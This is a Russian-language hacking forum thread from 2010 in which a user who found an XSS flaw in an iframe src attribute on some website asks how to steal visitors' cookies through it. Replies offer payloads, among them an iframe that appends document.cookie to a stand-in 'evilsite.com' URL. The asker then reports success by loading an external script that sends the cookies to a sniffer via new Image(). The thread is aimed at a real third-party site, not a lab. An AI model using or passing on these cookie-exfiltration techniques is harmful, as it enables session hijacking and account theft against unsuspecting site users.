XSS в IFRAME SRC. Как взять куки?

Discussion in 'Песочница' started by TomskDiver, 18 May 2010.

  1. TomskDiver

    TomskDiver New Member

    Joined:
    24 Apr 2008
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Нашел сайт с xss в теге iframe в параметре src. Т.е. работает <iframe src="javascript:alert('XSS')" style="display:none;"></iframe>. Но вот никак не получается сливать куки. Что только не пробовал, что только не читал:( Можно ли как-то красть куки через данную уязвимость?
     
  2. TomskDiver

    TomskDiver New Member

    Joined:
    24 Apr 2008
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Как мне кажется у вас ошибка.
    если после php оставить = то ничего не выводится.
    если после php поставить например ?c= то выводится: c='+document.cookie+'

    В src разве сработает document.cookie? Ведь надо писать что-то типа src="Javascript:blablabla document.cookie "
     
  3. IndigoMan

    IndigoMan New Member

    Joined:
    7 Jun 2008
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    scr параметр зависим от твоих входных данных? если нет, то ты просто модифицировал код html и все...это даже не уязвимость получается.
     
  4. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    попробуй так
     
    _________________________
  5. IndigoMan

    IndigoMan New Member

    Joined:
    7 Jun 2008
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    и так работает
    <iframe src="http://www.evilsite.com/?cookie=" + document. cookie style="display:none;"></iframe>
     
  6. TomskDiver

    TomskDiver New Member

    Joined:
    24 Apr 2008
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Redwood, IndigoMan - то как вы предложили не работает. Снифер будет выводить слова document. cookie, а не сами куки.
    satana-fu - РЕСПЕКТ! Получилось. В дополнительном js файле делаю new Image() c src на снифер и всё работает.